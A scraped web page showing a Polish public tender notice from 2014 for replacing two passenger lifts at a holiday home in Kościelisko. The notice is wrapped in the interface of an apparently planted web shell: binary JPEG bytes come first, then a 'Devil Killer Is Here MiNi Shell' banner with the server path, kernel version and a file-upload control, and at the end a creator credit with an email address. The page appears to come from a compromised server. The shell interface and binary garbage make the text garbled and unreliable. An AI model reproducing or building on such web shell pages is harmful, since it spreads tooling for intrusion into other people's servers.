JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140410/123388-N-2014.html

<p class="kh_header"><b>Warszawa: Modernizacja dwóch  dźwigów  osobowych w budynku nr 1 Domu  Wypoczynkowego Kościelisko zgodnie z PN-EN 81.1+A3</b><br>
<b>Numer ogłoszenia: 123388 - 2014; data zamieszczenia: 10.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Domy Wczasowe WAM Sp. z o.o. , ul. Syrokomli 6, 03-335 Warszawa, woj. mazowieckie, tel. 22 188 51 62, faks 22 188 51 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rewita.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dwóch  dźwigów  osobowych w budynku nr 1 Domu  Wypoczynkowego Kościelisko zgodnie z PN-EN 81.1+A3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
   Demontaż starych oraz montaż dwóch  nowych dźwigów osobowych ( w istniejących szybach, jeden sześcioprzystankowy, drugi pięcioprzystankowy) z napędem elektrycznym w  budynku nr 1 Domu  Wypoczynkowego Kościelisko ul. Nędzy-Kubińca 101, 34-511 Kościelisko, wynikający z potrzeby dostosowania urządzeń do obowiązujących przepisów normy dźwigowej   PN-EN 81.1+A3.
Lp	Wymagane parametry techniczne
1	Ilość	2 szt.
2	Typ	Elektryczny 1:1
3	Norma	EN 81.1+A3
4	Udźwig	500 kg
5	Prędkość	1 m/s
6	Wysokość podnoszenia	pierwszy dźwig -14 m (podszybie 1,5 m,        nadszybie 3,4 m); drugi dźwig - 11m (podszybie 1,5 m, nadszybie 3,4 m)
7	Przystanki	pierwszy dźwig  - 6/6/1 bez przelotu; drugi dźwig -  5/5/1 bez przelotu    
8	Szyb	1400 x 1700 mm
9	Maszynownia	Maszynownia górna
10	Zasilanie	Trzyfazowe 400V - oświetlenie 230V - 50 Hz
11	Napęd	Silnik VVVF, bez reduktorowy 4kW, 180 włączeń/godz.
12	Prowadnice kabinowe	82 x 68 x 9
13	Prowadnice przeciwwag	50 x 50 x 5
14	Przeciwwaga	Kompletna (bez klocków)
15	Liny nośne	Szt. 6 O 6
16	Sterowanie	Zbiorczość góra - dół, dojazd awaryjny do najbliższego przystanku, połączenie alarmowe GSM - karta po stronie Zamawiającego
17	Tablica sterowa	Mikroprocesorowa
18	Przyciski w kabinie	Do wyboru pięter, otwarcie drzwi, zamknięcie drzwi, alarm, wentylator
19	Sygnalizacja w kabinie	Wyświetlacz pozycji kabiny, strzałki kierunkowe, przeciążenie
20	Oznaczenie przystanków	0, 1, 2, 3, 4, 5;      0, 1, 2, 3, 4
21	Przyciski  na piętrach	Wezwania 
22	Sygnalizacja na piętrach	Wyświetlacz pozycji i kierunku jazdy kabiny
23	Oświetlenie szybu    i maszynowni	Zgodnie z aktualnymi normami

KABINA
24	Wymiary wew.    mm	1010 x 1120 x 2150 h
25	Wykonanie wewnętrzne	Stal nierdzewna satyna

DRZWI KABINOWE
26	Typ	2-panelowe teleskopowe
27	Wykonanie	Stal nierdzewna satyna
28	Wymiary 	750 x 2000 mm
29	Próg	Aluminiowy
30	Sufit	Podwieszany z oświetleniem pośrednim
31	Podłoga	Wykładzina antypoślizgowa
32	Dodatki	Odboje, światło awaryjne, kurtyna świetlna

DRZWI PRZYSTANKOWE
33	Typ	2-panelowe teleskopowe
34	Wykonanie	Stal nierdzewna satyna
35	Wymiary	750 x 2000 mm
36	Ościeżnica	Stal nierdzewna satyna
37	Próg	aluminiowy

W zakres planowanych robót wchodzi również;
   -  wykonanie instalacji elektrycznej, 
   -  malowanie szybów dźwigowych farbami emulsyjnymi i olejnymi,
   -  sporządzenie i dostarczenie dokumentacji rejestracyjnej do właściwej jednostki UDT,
   -  udział w badaniach i próbach dźwigu wymaganych przez UDT do wydania decyzji zezwalającej na  
      eksploatację, a także uiszczenie wszelkich opłat z tym związanych zgodnie z obowiązującymi   
      przepisami,
   -  zarejestrowanie oraz przekazanie Zamawiającemu protokołów i decyzji zezwalającej na 
      eksploatację dźwigów,
   -  wykonanie dokumentacji powykonawczej zgodnie z obowiązującymi przepisami i przekazanie jej 
      Zamawiającemu,
   -  opracowanie wchodzące w skład dokumentacji projektowej należy przekazać Zamawiającemu w 
      formie uniemożliwiającej jej przypadkowe zdekompletowanie - arkusze (kartki) powinny być 
      ponumerowane oraz zszyte, zbindowane lub połączone w jedną całość inną techniką.
2.   Zastosowane do wbudowania materiały, dostarczone wyroby i urządzenia winny posiadać
      wszelkie wymagane prawem dopuszczenia do obrotu i stosowania w budownictwie: atesty,
      certyfikaty, aprobaty techniczne, świadectwa badań i kontroli jakości.
3.   Wszystkie prace będą wykonywane na terenie czynnego obiektu - Wykonawca będzie
      zobowiązany do:
     1) etapowania wykonania robót budowlanych, tak, aby umożliwić normalne funkcjonowanie
         ośrodka,
     2) zabezpieczenia rejonu wykonywanych prac oraz do prowadzenia robót w sposób
        niezagrażający bezpieczeństwu zatrudnionych pracowników i gości przebywających w  ośrodku,
        zgodnie z obowiązującymi przepisami bhp i ppoż.,
     3) realizowania robót w sposób jak najmniej uciążliwy dla Zamawiającego, utrzymania
         należytego porządku w miejscu pracy i otoczeniu - utrzymania go w stanie wolnym od
         przeszkód komunikacyjnych oraz usuwania i składowania zbędnych materiałów, odpadów i
         śmieci a także niepotrzebnych urządzeń prowizorycznych,
4.   Wszelkie koszty związane z opracowaniem i uzgodnieniem dokumentacji oraz dopuszczeniem    
      dźwigów do eksploatacji ponosi Wykonawca. 
5.   Elementy z demontażu Wykonawca złoży w miejscu wskazanym przez Zamawiającego. 
6.   Gruz pochodzący z prac adaptacyjnych Wykonawca będzie zobowiązany własnym staraniem i na   
      własny koszt wywieźć poza teren nieruchomości i zutylizować.
7.  Zamawiający wymaga, aby po wykonaniu wszystkich czynności Wykonawca uporządkował miejsca 
      prowadzenia prac oraz pozostawił je w stanie czystym i nadającym się do użytkowania.
8.   Dźwigi po modernizacji muszą spełniać wymagania zawarte normach EN 81.1+A3 
9.   Wymagany min. okres gwarancji na dźwig nie może być krótszy niż okres gwarancji producenta,    
       jednak nie mniej niż  24 miesiące. 
10.  Wymagany okres gwarancji jakości i rękojmi na zrealizowane roboty budowlane wynosi minimum 
      36 miesięcy, liczonych od daty podpisania protokołu odbioru końcowego.  
11.   W ramach gwarancji Wykonawca zobowiązany będzie do utrzymania dostarczonych wyrobów
       i urządzeń w pełnej sprawności technicznej - bezpłatnego świadczenia usług serwisowych
       obejmujących usuwanie usterek i wszelkich nieprawidłowości w ich działaniu oraz
       przeprowadzania konserwacji i przeglądów technicznych zgodnie z wymogami ich
       producentów i UDT. Podjęcie działań przez Wykonawcę zmierzających do usunięcia wad i
       usterek nastąpi w czasie do 24 godzin od ich zgłoszenia przez Zamawiającego. Natomiast
       ostateczne usunięcie wad i usterek nastąpi w czasie do 96 godzin od momentu zgłoszenia. W
       przypadku awarii dźwigów odpowiednio podjęcie działań do 2 godz., usunięcie usterki w
       ciągu 12 godz.
12.  Przed złożeniem oferty Wykonawcy zobowiązani są do przeprowadzenia wizji lokalnej w
      siedzibie Zamawiającego, w celu dokonania niezbędnych sprawdzeń, obliczeń, ekspertyz,
      uzgodnień, aby rozstrzygnąć ewentualne wątpliwości i zapewnić jednoznaczność składanej
      oferty, zarówno w zakresie cenowo przedmiotowym jak również odnośnie do terminu
      wykonania robót. Całkowite koszty związane z dokonaniem wizji lokalnej ponosi Wykonawca.
      Termin przeprowadzenia wizji lokalnej należy ustalić z Zamawiającym. Wykonawca
      zobowiązany jest do realizacji przedmiotu zamówienia zgodnie z obowiązującymi przepisami
      prawa, w szczególności do przestrzegania zasad bezpieczeństwa. W celu realizacji powyższego
      obowiązku zobowiązany jest do realizacji zamówienia przy udziale osób o odpowiednich
      kwalifikacjach i doświadczeniu zawodowym a także posiadających wymagane prawem
      uprawnienia.
10.  Zamawiający nie przewiduje zamówień uzupełniających.
11.  Zamawiający nie dopuszcza składania ofert wariantowych.
12. W opisie przedmiotu zamówienia zamieszczone są podstawowe informacje umożliwiające  
      realizację zamówienia. Szczegółowy zakres robót określony jest w przedmiarze robót     
      stanowiącym załącznik nr 8 do SIWZ.
13. Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5, 45.31.00.00-3, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do postępowania, Wykonawca ma obowiązek wnieść wadium w wysokości:5 000,00 zł, (słownie: pięć tysięcy zł  00/100);</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny - ocena spełniania warunku dotyczącego posiadanych uprawnień do wykonywania działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania dokonana będzie na podstawie oświadczenia stanowiącego załącznik Nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej jedną realizację  obejmującą dostawę i wymianę dźwigu, o wartości nie mniejszej niż  150 000 PLN brutto
w celu potwierdzenia powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz realizacji robót  zgodnie z załącznikiem nr 4 do SIWZ i załączyć odpowiednie referencje/dokumenty potwierdzające, że zadania te zostały należycie wykonane;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny - ocena spełniania warunku dotyczącego dysponowania odpowiednim potencjałem technicznym dokonana będzie na podstawie oświadczenia stanowiącego załącznik Nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje lub będzie dysponował osobą pełniącą stanowisko kierownicze o poniższych uprawnieniach:
	- Kierownik robót - doświadczenie zawodowe przynajmniej 3 lata od uzyskania      
        uprawnień budowlanych w branży konstrukcyjno-budowlanej, zrzeszenie w Izbie 
        Inżynieryjnej Budownictwa (aktualna opłata),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny - ocena spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej dokonana będzie na podstawie oświadczenia stanowiącego załącznik Nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rewita.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.rewita.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 10:30, miejsce: Dom Wczasowy Kościelisko ul. Nędzy-Kubińca 101, 34-511 Kościelisko - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com